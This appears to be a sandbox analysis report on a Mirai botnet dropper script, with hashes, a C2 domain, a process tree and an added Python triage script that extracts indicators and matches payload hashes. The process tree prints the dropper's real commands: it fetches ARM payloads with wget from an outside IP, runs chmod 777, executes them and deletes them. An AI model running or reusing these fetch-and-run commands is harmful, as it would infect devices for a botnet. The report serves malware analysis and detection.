Analysis

  • max time kernel
    7s
  • max time network
    9s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240729-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    03-02-2025 20:48

General

  • Target

    huhu.sh

  • Size

    612B

  • MD5

    03e98be4a12a9568c29a2af67f0203e6

  • SHA1

    4081ba65d287eb000bc8acf85450576502f320c0

  • SHA256

    28dc0d138ce29791960807af2751f548f052071ea8bd97978844fd41bd6716fa

  • SHA512

    c544a875edc33cd939ff88737d1a04a59181a0fd2febc6742b8e6412640e975c02e4430c5f88ed8217de48ef9187b3a68a7524be71b7191b8fc76c8c30764f6b

Malware Config

Extracted

Family

mirai

C2

gay.nguyenletriloc.pro

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification (1 TTP, 4 IoCs)

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE (4 IoCs)

Processes

  • /tmp/huhu.sh
    /tmp/huhu.sh
    1⤵
    • Executes dropped EXE
    PID:712
    • /bin/rm
      rm -rf main_arm
      2⤵
      PID:715
    • /usr/bin/wget
      wget http://80.76.51.164/main_arm -O -
      2⤵
      PID:717
    • /bin/chmod
      chmod 777 main_arm
      2⤵
      • File and Directory Permissions Modification
      PID:728
    • /main_arm
      ./main_arm pdvr
      2⤵
      PID:730
    • /bin/rm
      rm -rf main_arm
      2⤵
      PID:734
    • /bin/rm
      rm -rf main_arm5
      2⤵
      PID:735
    • /usr/bin/wget
      wget http://80.76.51.164/main_arm5 -O -
      2⤵
      PID:737
    • /bin/chmod
      chmod 777 main_arm5
      2⤵
      • File and Directory Permissions Modification
      PID:745
    • /main_arm5
      ./main_arm5 pdvr
      2⤵
      PID:746
    • /bin/rm
      rm -rf main_arm5
      2⤵
      PID:748
    • /bin/rm
      rm -rf main_arm6
      2⤵
      PID:749
    • /usr/bin/wget
      wget http://80.76.51.164/main_arm6 -O -
      2⤵
      PID:751
    • /bin/chmod
      chmod 777 main_arm6
      2⤵
      • File and Directory Permissions Modification
      PID:753
    • /main_arm6
      ./main_arm6 pdvr
      2⤵
      PID:754
    • /bin/rm
      rm -rf main_arm6
      2⤵
      PID:756
    • /bin/rm
      rm -rf main_arm7
      2⤵
      PID:757
    • /usr/bin/wget
      wget http://80.76.51.164/main_arm7 -O -
      2⤵
      PID:758
    • /bin/chmod
      chmod 777 main_arm7
      2⤵
      • File and Directory Permissions Modification
      PID:759
    • /main_arm7
      ./main_arm7 pdvr
      2⤵
      PID:760
    • /bin/rm
      rm -rf main_arm7
      2⤵
      PID:762
    • /bin/rm
      rm /tmp/huhu.sh
      2⤵
      PID:763
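As an added triage example (not part of the sandbox report or of the malware itself): a Python script that parses the child command lines recorded above, groups them into per-payload stages (rm, wget, chmod 777, execute with the `pdvr` argument, rm), flags the resulting dropper pattern, extracts the download host and URLs, and checks a byte string against the four payload SHA256 values listed under Downloads. Two caveats it makes visible: wget's `-O -` sends the response body to standard output rather than to a file, so in a live run the chmod and `./main_arm` that follow would act on a file wget never wrote; and this sandbox is debian-9 MIPS (big-endian) while the payloads are named for ARM, so the exec lines in the tree should not be read as confirming that the payloads ran. The command list and hash set are copied from this report; the grouping logic and the detection rule are the example's own assumptions.

```python
import hashlib
import re
from dataclasses import dataclass, field

# Child command lines of /tmp/huhu.sh, copied from the process tree above
# (constructed input for this example: the report's own commands, in order).
PROCESS_CMDLINES = [
    "rm -rf main_arm",
    "wget http://80.76.51.164/main_arm -O -",
    "chmod 777 main_arm",
    "./main_arm pdvr",
    "rm -rf main_arm",
    "rm -rf main_arm5",
    "wget http://80.76.51.164/main_arm5 -O -",
    "chmod 777 main_arm5",
    "./main_arm5 pdvr",
    "rm -rf main_arm5",
    "rm -rf main_arm6",
    "wget http://80.76.51.164/main_arm6 -O -",
    "chmod 777 main_arm6",
    "./main_arm6 pdvr",
    "rm -rf main_arm6",
    "rm -rf main_arm7",
    "wget http://80.76.51.164/main_arm7 -O -",
    "chmod 777 main_arm7",
    "./main_arm7 pdvr",
    "rm -rf main_arm7",
    "rm /tmp/huhu.sh",
]

# SHA256 values of the four downloaded payloads, from the Downloads section.
KNOWN_SHA256 = {
    "b96ddaa05b3e4f2f827dc34f082b703c0ffba80f80ca4c8b502af3cf74f3f51d",  # main_arm
    "3f74ae49e4101de58f98982358cafab767a1d90222c6ccba536e57c580b7b377",  # main_arm5
    "71e5b3b550834ebf379c37f7f18a85825bf51a2bfb15ec01b41fd1f782b6a649",  # main_arm6
    "021af5763cd627a513838dcde0247979598f8f8efcf66ce4abf9a54fb5f64e4e",  # main_arm7
}

WGET_RE = re.compile(
    r"^wget\s+(?P<url>https?://(?P<host>[^/\s]+)/(?P<path>\S+))(?:\s+-O\s+(?P<out>\S+))?"
)


@dataclass
class Stage:
    """One fetch-and-run stage of the dropper, keyed by payload basename."""
    name: str
    url: str = ""
    host: str = ""
    mode: str = ""                              # chmod mode applied to the payload
    argv: list = field(default_factory=list)    # arguments passed at execution
    removed_after_exec: bool = False            # rm issued after the exec line
    to_stdout: bool = False                     # wget -O - : body to stdout, no file written


def parse_chain(cmdlines):
    """Group the flat command list into per-payload stages, preserving first-seen order."""
    stages, order = {}, []

    def stage(name):
        if name not in stages:
            stages[name] = Stage(name)
            order.append(name)
        return stages[name]

    for cmd in cmdlines:
        argv = cmd.split()
        if not argv:
            continue
        if argv[0] == "wget":
            m = WGET_RE.match(cmd)
            if m:
                st = stage(m["path"].rsplit("/", 1)[-1])
                st.url, st.host = m["url"], m["host"]
                st.to_stdout = m["out"] == "-"
        elif argv[0] == "chmod" and len(argv) >= 3:
            stage(argv[-1]).mode = argv[1]
        elif argv[0].startswith("./"):
            stage(argv[0][2:]).argv = argv[1:]
        elif argv[0] == "rm":
            name = argv[-1].rsplit("/", 1)[-1]
            # Only an rm after the exec line counts as cleanup; the rm before
            # wget just clears any previous copy, and "rm /tmp/huhu.sh" is the
            # script deleting itself, which is not a payload stage.
            if name in stages and stages[name].argv:
                stages[name].removed_after_exec = True
    return [stages[n] for n in order]


def is_dropper_chain(stages):
    """Flag the pattern seen here: fetch, world-writable chmod, exec, delete."""
    return any(s.url and s.mode == "777" and s.argv and s.removed_after_exec for s in stages)


def extract_iocs(stages):
    return {
        "hosts": sorted({s.host for s in stages if s.host}),
        "urls": [s.url for s in stages if s.url],
        "exec_args": sorted({a for s in stages for a in s.argv}),
        "never_written": [s.name for s in stages if s.to_stdout],
    }


def matches_known_payload(data: bytes) -> bool:
    """True if the bytes hash to one of the payload SHA256 values above."""
    return hashlib.sha256(data).hexdigest() in KNOWN_SHA256


if __name__ == "__main__":
    chain = parse_chain(PROCESS_CMDLINES)
    print("dropper chain:", is_dropper_chain(chain))
    print(extract_iocs(chain))
```

The `never_written` list is the practical check: every stage here used `-O -`, so on a host where this script actually ran, the evidence to look for is the outbound HTTP requests to 80.76.51.164 and the DNS lookup for the C2 domain, not files named main_arm* on disk.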

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /main_arm

    Filesize

    130KB

    MD5

    ea04094bf0f18047c4bfdb570b8bc339

    SHA1

    e968d1c312c0ae549b246572761227b62c438bc7

    SHA256

    b96ddaa05b3e4f2f827dc34f082b703c0ffba80f80ca4c8b502af3cf74f3f51d

    SHA512

    0f11722b737c98d8cec00d23f29d4f9589b0511ccbdc0d4e984fe154c8d14b39157540393ce0b0309f10672c2ab371e5313a8c91b102f526335b1286a4e57a1f

  • /main_arm5

    Filesize

    126KB

    MD5

    188b7e2886ceb67b5de635c72b4377cd

    SHA1

    5dde7e770dd94b7077794b30ee340f87630a8572

    SHA256

    3f74ae49e4101de58f98982358cafab767a1d90222c6ccba536e57c580b7b377

    SHA512

    bce91f75188c99ca7a71658b2815840c14949a15db9ac0d6a7cbe3c4aba6ffe92965049953dc7c3a17dbd31f2f69a79f24ac57e61d72f78aba1900781029987f

  • /main_arm6

    Filesize

    141KB

    MD5

    447f0e23f58bf497e2ae1c103dec482e

    SHA1

    edd209ceeafc7fe0987e4844fec9f170c02bdcb5

    SHA256

    71e5b3b550834ebf379c37f7f18a85825bf51a2bfb15ec01b41fd1f782b6a649

    SHA512

    ab451e7a3c9add9d6f6de31d592bbae9d2a3cb79ecf9e73815d5ddb45ae74113078934a7066cf5133078686935dc27cb80b5286e7fa74760143870fc4d3014d0

  • /main_arm7

    Filesize

    179KB

    MD5

    1c3bd0890fa6cbf314ec2cdc698fc1c8

    SHA1

    f165ecadfa8e07182029ab8cb8a6329b9574a795

    SHA256

    021af5763cd627a513838dcde0247979598f8f8efcf66ce4abf9a54fb5f64e4e

    SHA512

    aab772c56a231e14b0b0bf9fbc328b8d750ad0743db9426c8078420b01c85aeb2737d59d47e34ba3471869f65483591fe7b0de24720647db086c68e0001f335c